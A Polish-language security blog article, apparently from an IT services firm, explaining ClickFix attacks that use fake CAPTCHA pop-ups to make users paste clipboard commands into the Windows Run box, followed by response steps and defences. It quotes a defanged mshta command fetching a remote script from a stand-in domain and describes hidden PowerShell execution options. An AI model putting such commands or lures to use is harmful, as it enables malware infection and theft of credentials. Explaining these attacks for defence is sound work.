Cyberprzestępcy nieustannie modyfikują swoje metody ataku, a tradycyjny phishing oparty na załącznikach PDF czy złośliwych plikach wykonywalnych ustępuje miejsca znacznie bardziej wyrafinowanym technikom socjotechnicznym. Jednym z najbardziej niebezpiecznych i dynamicznie rozwijających się zagrożeń w ostatnim czasie jest atak typu ClickFix, który wykorzystuje fałszywe okna weryfikacji CAPTCHA oraz rzekome komunikaty o błędach przeglądarki, aby skłonić użytkownika do samodzielnego uruchomienia złośliwego kodu. W tym artykule szczegółowo analizujemy, na czym polega ten schemat, dlaczego omija on tradycyjne zabezpieczenia systemowe i w jaki sposób kompleksowe bezpieczeństwo cyfrowe pozwala uchronić organizację przed utratą cennych danych.
Spis treści:
- Czym jest atak ClickFix i jak działają fałszywe CAPTCHA?
- Anatomia oszustwa: Od fałszywej weryfikacji do terminala
- Techniczne kulisy socjotechniki: Jak napastnicy przełamują czujność użytkownika
- Porównanie: Tradycyjny phishing a atak typu ClickFix
- Jakie szkody wyrządza ClickFix i co najczęściej trafia na komputer?
- Pierwsza pomoc po kliknięciu: Co robić, gdy wykonasz niebezpieczne polecenie?
- Jak zabezpieczyć firmę i użytkowników przed atakami typu ClickFix?
- Często zadawane pytania (FAQ)

Czym jest atak ClickFix i jak działają fałszywe CAPTCHA?
Technika ClickFix to względnie nowy, lecz niezwykle groźny wektor ataku socjotechnicznego. W przeciwieństwie do klasycznych cyberataków, w których przestępcy starają się przemycić na dysk ofiary zainfekowany plik wykonywalny, ClickFix polega na nakłonieniu samego użytkownika do ręcznego skopiowania i uruchomienia niebezpiecznego polecenia w konsoli systemowej. Przestępcy wykorzystują do tego celu zmanipulowane strony internetowe, zainfekowane witryny WordPress, fałszywe reklamy lub przejęte domeny, na których wyświetlają wyskakujące okna imitujące popularne mechanizmy weryfikacji ludzkiej, takie jak reCAPTCHA czy Cloudflare Turnstile.
Głównym celem ataku jest oszukanie mechanizmów obronnych systemu operacyjnego oraz oprogramowania antywirusowego. Ponieważ użytkownik sam otwiera okno uruchamiania programu i samodzielnie wkleja treść złośliwego skryptu, system operacyjny traktuje to działanie jako intencjonalne polecenie administratora lub uprawnionego użytkownika. W ten sposób przestępcy bez problemu omijają filtry przeglądarek, które zazwyczaj blokują automatyczne pobieranie nieznanych plików executable.
Anatomia oszustwa: Od fałszywej weryfikacji do terminala
Proces infekcji za pomocą metody ClickFix składa się z kilku precyzyjnie zaplanowanych kroków. Wszystko zaczyna się w momencie, gdy użytkownik trafia na stronę zawierającą złośliwy kod JavaScript. Może to być wynik kliknięcia w fałszywy link w wiadomości e-mail, wejście na porwaną stronę domową lub kliknięcie w zainfekowaną reklamę w wyszukiwarce. Po załadowaniu witryny na ekranie pojawia się profesjonalnie wyglądający nakładka z komunikatem informującym o konieczności potwierdzenia, że użytkownik nie jest botem, albo o błędzie odtwarzania wideo czy braku odpowiedniego kodeka.
W oknie weryfikacyjnym pojawia się czytelna instrukcja. Zamiast standardowego zaznaczania obrazków z sygnalizacją świetlną czy przejściami dla pieszych, użytkownik zostaje poproszony o wykonanie następujących czynności:
- Naciśnięcie kombinacji klawiszy Win + R na klawiaturze (co powoduje otwarcie systemowego okna Uruchom w systemie Windows).
- Naciśnięcie skrótu Ctrl + V (co wkleja wcześniej automatycznie skopiowaną do schowka treść złośliwego polecenia).
- Naciśnięcie klawisza Enter w celu zatwierdzenia i wykonania instrukcji.
W momencie, gdy użytkownik wykonuje te trzy proste ruchy, w tle uruchamia się zazwyczaj PowerShell lub wiersz poleceń (cmd.exe), który natychmiast łączy się z serwerem dowodzenia przestępców (C2), pobiera właściwą dawkę złośliwego oprogramowania i instaluje ją w systemie bez wiedzy poszkodowanego.
Dlaczego klasyczne antywirusy bywają bezsilne?
Tradycyjne programy antywirusowe bazują w dużej mierze na sygnaturach plików zapisywanych na dysku komputera. Gdy przeglądarka pobiera plik .exe lub .zip, antywirus natychmiast go skanuje. W przypadku ataku ClickFix na dysku nie pojawia się żaden tradycyjny plik instalacyjny w momencie pierwszej interakcji. Kod, który trafia do schowka użytkownika, jest często silnie zaciemniony (zobfuskowany) i wykorzystuje natywne narządzia systemowe, takie jak PowerShell, MSHTA czy WScript. Są to tak zwane narzędzia typu Living off the Land (LOLBins) – oficjalne składowe systemu Windows, które same w sobie są w pełni legalne i bezpieczne.
ClickFix nie przełamuje zabezpieczeń komputera za pomocą zaawansowanych luk zero-day. Zamiast tego haczy najsłabsze ogniwo łańcucha ochrony – ludzką rutynę i zaufanie do systemowych komunikatów.
Z punktu widzenia systemu operacyjnego polecenie wydane z poziomu okna Uruchom jest w pełni legalne, ponieważ zostało zainicjowane bezpośrednio przez osobę siedzącą przed monitorem. Z tego powodu bez zaawansowanych narzędzi klasy EDR czy skanerów pamięci operacyjnej wysoce prawdopodobne jest, że tradycyjny antywirus przepuści proces pobierania ładunku złośliwego oprogramowania.
Techniczne kulisy socjotechniki: Jak napastnicy przełamują czujność użytkownika
Sukces ataku ClickFix opiera się niemal w całości na manipulacji psychologicznej połączonej z automatyzacją przeglądarki. Skrypt umieszczony na niebezpiecznej stronie internetowej cicho modyfikuje zawartość schowka systemowego użytkownika za pomocą interfejsu API Clipboard (np. navigator.clipboard.writeText) dokładnie w momencie, gdy strona się ładuje lub gdy użytkownik kliknie dowolny element interfejsu. Użytkownik nie musi nawet niczego ręcznie kopiować – złośliwy kod wkleja się samoczynnie do pamięci podręcznej.
Komunikaty prezentowane na ekranie są zaprojektowane w sposób niezwykle przekonujący. Przestępcy podrabiają identyfikację wizualną znanych firm technologicznych, takich jak Google, Microsoft, Cloudflare czy Cloudflare Turnstile. Stosują oryginalne logotypy, czcionki oraz układy graficzne. Często podają absurdalne, ale brzmiące technicznie uzasadnienia, np.: Rozwiązywanie problemu ze strumieniowaniem wideo: wklej kod naprawczy, aby zaktualizować certyfikat SSL przeglądarki. Pod presją czasu lub z chęci szybkiego uzyskania dostępu do treści, użytkownicy bezrefleksyjnie wykonują podane instrukcje.
Skróty klawiszowe jako broń: Win + R, Ctrl + V, Enter
Zastosowanie kombinacji klawiszy Win + R to ze strony napastników majstersztyk socjotechniczny. Okno Uruchom jest wbudowanym elementem systemu Windows, znanym wielu użytkownikom jako narzędzie do szybkiego otwierania aplikacji czy folderów. Przeciętny użytkownik nie kojarzy naciśnięcia tej kombinacji z bezpośrednim zagrożeniem, w przeciwieństwie do pobierania nieznanego pliku z rozszerzeniem .exe czy .bat.
Co więcej, cała procedura trwa dosłownie 3 sekundy. Przestępcy piszą na ekranie prostą instrukcję krok po kroku:
- Krok 1: Naciśnij Win + R
- Krok 2: Naciśnij Ctrl + V
- Krok 3: Naciśnij Enter
Brak skomplikowanych operacji sprawia, że atak działa niesamowicie sprawnie. Po naciśnięciu klawisza Enter okno dialogowe znika, a dalsza część infekcji przebiega całkowicie w tle, nie dając użytkownikowi żadnych wyraźnych sygnałów, że w systemieła nastąpiła jakakolwiek niepożądana zmiana.
Złośliwy kod w schowku: Szybka analiza skryptów PowerShell i MSHTA
Co tak naprawdę trafia do schowka użytkownika? Najczęściej są to jednolinitkowe polecenia (one-linery) napisane w języku PowerShell lub wykorzystujące do odpalenia złośliwego kodu aplikację MSHTA (Microsoft HTML Application Host). Poniżej prezentujemy opisy struktur, jakie najczęściej stosują cyberprzestępcy:
W przypadku skryptów PowerShell polecenie często zawiera parametry takie jak -WindowStyle Hidden oraz -ExecutionPolicy Bypass. Pierwszy parametr powoduje, że okno konsoli PowerShell zamyka się natychmiast lub w ogóle nie pojawia się na ekranie komputera, zaś drugi omija domyślne polityki bezpieczeństwa systemu Windows ograniczające uruchamianie niezaufanych skryptów. Następnie polecenie pobiera z serwera przestępców złośliwy ciąg znaków, dekoduje go z formatu Base64 i wykonuje go bezpośrednio w pamięci RAM.
Innym popularnym sposobem jest użycie polecenia mshta.exe hxxp://zlosliwa-domena[.]com/skrypt.hta. Narzędzie MSHTA pozwala na wykonywanie skryptów VBScript lub JavaScript zawartych w plikach HTML poza kontekstem bezpiecznej piaskownicy przeglądarki internetowej, uzyskując pełne uprawnienia zalogowanego użytkownika.
Porównanie: Tradycyjny phishing a atak typu ClickFix
Aby lepiej zrozumieć ewolucję zagrożeń i odpowiednio dopasować systemy obronne w firmie, warto zestawić ze sobą cechy charakterystyczne klasycznego phishingu oraz opisywanej metody ClickFix.
| Cecha ataku | Tradycyjny Phishing | Atak typu ClickFix |
|---|---|---|
| Główny wektor dostawy | Wiadomości e-mail, załączniki PDF/DOCX, pliki .EXE | Strony WWW, fałszywe okna CAPTCHA, zainfekowane reklamy |
| Rola użytkownika | Pobranie i otwarcie pliku z załącznika lub linku | Ręczne wklejenie komendy do systemowego okna Uruchom |
| Wykrywalność przez Antywirus (AV) | Wysoka (skanowanie plików przed uruchomieniem) | Niska (brak pliku na dysku w początkowej fazie) |
| Wykorzystywane narzędzia | Zewnętrzne pliki wykonywalne, makra pakietu Office | Natywne skrepty PowerShell, MSHTA, CMD (LOLBins) |
| Szybkość infekcji | Zależna od pobrania i uruchomienia pliku | Błyskawiczna (natychmiast po naciśnięciu Enter) |
Z powyższego zestawienia jasno wynika, że ClickFix drastycznie skraca ścieżkę od momentu kontaktu użytkownika z zagrożeniem do pełnego przejęcia kontroli nad systemem. Dlatego tak ważne są nowoczesne usługi oraz kompleksowe bezpieczeństwo sieciowe, które monitorują zachowanie procesów w czasie rzeczywistym, a nie tylko zawartość dysku twardego.
Jakie szkody wyrządza ClickFix i co najczęściej trafia na komputer?
ClickFix sam w sobie jest jedynie mechanizmem dostawczym (tzw. dropperem lub loaderem). Zadaniem skryptu wklejanego przez użytkownika jest przygotowanie gruntu pod właściwy ładunek szkodliwego oprogramowania. Analiza incydentów z ostatnich miesięcy wskazuje, że cyberprzestępcy najczęściej wykorzystują tę technikę do dystrybucji kilku konkretnych rodzin złośliwego kodu.
Stealery danych, infostealery i trojany dostępowe (RAT)
Najczęstszym celem ataku typu ClickFix jest kradzież tożsamości cyfrowej oraz danych uwierzytelniających. Na zainfekowany komputer trafiają zazwyczaj tzw. Infostealery. Do najpopularniejszych należą:
- Lumma Stealer: Wyjątkowo agresywne oprogramowanie nastawione na kradzież haseł zapisanych w przeglądarkach internetowych, danych z portfeli kryptowalutowych, ciasteczek sesyjnych (session cookies) oraz danych z aplikacji takich jak Telegram czy Discord.
- RedLine Stealer: Jeden z najpopularniejszych stealerów na rynku, który przeczesuje system pod kątem danych do logowania, informacji o karcie kredytowej oraz konfiguracji VPN i klientów FTP.
- Vidar / DarkGate: Zaawansowane szkodniki zdolne do pobierania kolejnych modułów, rejestrowania naciskanych klawiszy (keylogging) oraz tworzenia potajemnych połączeń do zdalnego zarządzania komputerem.
- AsyncRAT / Remcos RAT: Trojany zdalnego dostępu pozwalające cyberprzestępcom na pełny podgląd pulpitu, przejmowanie kamery internetowej, mikrofonu oraz wykonywanie dowolnych poleceń wewnątrz sieci firmowej.
Kradzież ciasteczek sesyjnych jest szczególnie niebezpieczna dla organizacji. Pozwala przestępcom na ominięcie dwuskładnikowej weryfikacji (2FA/MFA). Jeśli przestępca wykradnie aktywny token sesji z przeglądarki pracownika, może zalogować się do firmowego konta Microsoft 365, Google Workspace czy systemu CRM bezpośrednio ze swojego komputera, nie znając nawet loginu i hasła!
Pierwsza pomoc po kliknięciu: Co robić, gdy wykonasz niebezpieczne polecenie?
Sytuacja, w której pracownik lub użytkownik zorientuje się, że wkleił nieznaną komendę i nacisnął Enter, wymaga natychmiastowego i zdecydowanego działania. Czas odgrywa tutaj kluczową rolę, ponieważ infostealery potrzebują często zaledwie od kilkunastu sekund do kilku minut, aby spakować wyciągnięte dane i wysłać je na serwer przestępców.
Plan działania krok po kroku w incydencie bezpieczeństwa
Jeśli podejrzewasz, że padłeś ofiarą ataku ClickFix, wykonaj niezwłocznie następujące kroki:
Krok 1: Odłącz komputer od sieci internetowej.
To bezwzględnie najważniejsza czynność. Wyciągnij kabel sieciowy Ethernet z komputera lub wyłącz kartę Wi-Fi. Odcięcie dostępu do Internetu uniemożliwi złośliwemu oprogramowaniu wysłanie skradzionych haseł na serwer C2 oraz zablokuje możliwość pobrania kolejnych etapów szkodliwego kodu.
Krok 2: Nie wyłączaj komputera z prądu, ale zgłoś incydent do działu IT.
Zamknięcie systemu lub odłączenie zasilania może doprowadzić do utraty cennych śladów w pamięci RAM, które są kluczowe dla analityków bezpieczeństwa do ustalenia, co dokładnie zostało skradzione. Poinformuj zespół ds. cyberbezpieczeństwa lub administratora sieci w swojej firmie.
Krok 3: Unieważnij aktywne sesje i zmień hasła z INNEGO, bezpiecznego urządzenia.
Z poziomu telefonu komórkowego lub innego czystego komputera natychmiast zaloguj się do kluczowych kont (pocztowych, bankowych, firmowych) i kliknij opcję Wyloguj ze wszystkich urządzeń lub Unieważnij sesje. Zmień hasła dostępu oraz upewnij się, że dwuskładnikowe uwierzytelnianie (MFA) pozostaje aktywne.
Krok 4: Przeprowadź szczegółowe skanowanie i analizę incydentu.
Wykorzystaj profesjonalne oprogramowanie EDR lub zleć audyt zewnętrznym specjalistom. W wielu przypadkach optymalnym rozwiązaniem po infekcji infostealerem jest całkowite zaoranie (sformatowanie) systemu operacyjnego i ponowna instalacja z czystego obrazu.
Pamiętaj, że wczesne wykrycie i profesjonalna obsługa incydentów to podstawa ochrony infrastruktury. Jeśli Twoja firma potrzebuje wsparcia w przygotowaniu procedur reagowania, warto wdrożyć zaawansowane usługi z zakresu bezpieczeństwa IT, które pozwalają minimalizować skutki tego typu błędów ludzkich.
Jak zabezpieczyć firmę i użytkowników przed atakami typu ClickFix?
Ochrona przed zagrożeniami pokroju ClickFix wymaga wielowarstwowej strategii obronnej (Defense in Depth). Ponieważ atak polega na oszukaniu człowieka i wykorzystaniu wbudowanych narzędzi systemowych, pojedynczy element zabezpieczeń nie wystarczy.
Oto najważniejsze filary skutecznej ochrony przed tą techniką:
- Ograniczenie uprawnień użytkowników (Principle of Least Privilege): Pracownicy nie powinni pracować na co dzień na kontach z uprawnieniami administratora lokalnego. Ograniczenie praw utrudnia skryptom PowerShell wprowadzanie głębokich zmian w systemie i instalowanie usług systemowych.
- Blokowanie lub ograniczenie narzędzi PowerShell i MSHTA: Konfiguracja zasad grup (GPO) lub zasad AppLocker / Windows Defender Application Control (WDAC). Można zablokować możliwość wykonywania niepodpisanych skryptów PowerShell lub całkowicie zablokować uruchamianie
mshta.exedla zwykłych użytkowników. - Wdrożenie rozwiązań klasy EDR / XDR: Nowoczesne systemy Endpoint Detection and Response nie skupiają się na plikach, ale na analizie zachowania (behavioral analysis). Gdy EDR zauważy, że proces przeglądarki Chrome wywołał powłokę PowerShell z ukrytym oknem i zakodowanym ciągiem Base64, natychmiast przerwie ten proces i odizoluje komputer od sieci.
- Edukacja pracowników i szkolenia z cyberbezpieczeństwa: Budowanie świadomości zespołu jest kluczowe. Użytkownicy muszą wiedzieć, że żaden legalny serwis internetowy, bank czy dostawca usług chmurowych NIGDY nie wymaga wklejania jakichkolwiek komend do okna uruchamiania systemu Windows w celu weryfikacji tożsamości.
- Filtrowanie ruchu sieciowego i ochrona DNS: Bloki dostępu do nowo zarejestrowanych domen (NRDs) oraz stron o niskim reputacji z poziomu zapory sieciowej (Firewall/UTM) pozwalają zatrzymać komunikację skryptu z serwerem dowodzenia C2.
Często zadawane pytania (FAQ)
Czy kliknięcie „Zezwól” lub skopiowanie tekstu ze strony jest już niebezpieczne?
Samo skopiowanie tekstu do schowka przez stronę internetową nie powoduje jeszcze infekcji komputera. Do momentu, gdy nie otworzysz okna uruchamiania (Win + R) i nie wkleisz tam komendy zatwierdzając ją klawiszem Enter, Twój system pozostaje bezpieczny. Schowek zawiera jedynie ciąg tekstowy. Danger pojawia się dopiero w chwili przekazania tego tekstu do wykonania przez interpreter poleceń systemowych.
Dlaczego reCAPTCHA na oficjalnych stronach nie wymaga wklejania komend?
Prawdziwe mechanizmy weryfikacji CAPTCHA (takie jak Google reCAPTCHA, hCaptcha czy Cloudflare Turnstile) działają całkowicie wewnątrz przeglądarki internetowej. Wymagają one jedynie kliknięcia myszką, rozwiązania zagadki wizualnej lub działają całkowicie bezobsługowo w tle. Żadna bezpieczna strona WWW nie ma technicznej potrzeby ani prawa żądać od użytkownika uruchamiania programów na jego komputerze osobistym.
Czy użytkownicy systemów macOS i Linux są bezpieczni przed ClickFix?
Choć większość obecnych kampanii ClickFix celuje w użytkowników systemu Windows (wykorzystując PowerShell oraz skrót Win+R), pojawiają się już warianty skierowane na użytkowników macOS. W takich przypadkach fałszywa strona prosi o otwarcie aplikacji Terminal (np. za pomocą Spotlight Cmd + Spacja), wklejenie komendy curl i zatwierdzenie hasłem sudo. Zasada działania jest identyczna, a zagrożenie równie realne.
Jak sprawdzić, co dokładnie znajdowało się w moim schowku?
W systemie Windows możesz otworzyć zwykły Notatnik (Notepad) i nacisnąć Ctrl + V. Zobaczysz wtedy pełną treść tekstu, który został skopiowany ze strony. Jeśli widzisz tam skomplikowane polecenia zawierające słowa takie jak powershell, iex, Invoke-WebRequest, [System.Text.Encoding] lub długie losowe ciągi znaków, pod żadnym pozorem nie uruchamiaj tego kodu w konsoli systemowej.
Co zrobić, aby długofalowo podnieść bezpieczeństwo cyfrowe w firmie?
Ochrona przed nowoczesnymi zagrożeniami wymaga ciągłego audytu środowiska IT, wdrożenia polityk Zero Trust, stałego monitorowania punktów końcowych oraz regularnego testowania czujności pracowników poprzez kontrolowane symulacje ataków phishingowych. Prace te warto powierzyć doświadczonym specjalistom ds. bezpieczeństwa.
Bezpieczeństwo IT to proces, który wymaga połączenia odpowiedniej technologii, przemyślanych procedur oraz stałej edukacji użytkowników. Zadbaj o kompleksową ochronę swojej firmy i nie pozwól, aby jedno nieostrożne kliknięcie sparaliżowało działalność Twojego przedsiębiorstwa.
Chcesz skonsultować stan bezpieczeństwa IT w swojej firmie lub wdrażać skuteczne mechanizmy obronne przed atakami typu ClickFix? Skontaktuj się ze specjalistami z Nexus Group. Zadzwoń do nas już dziś: +48 88 12 13 206.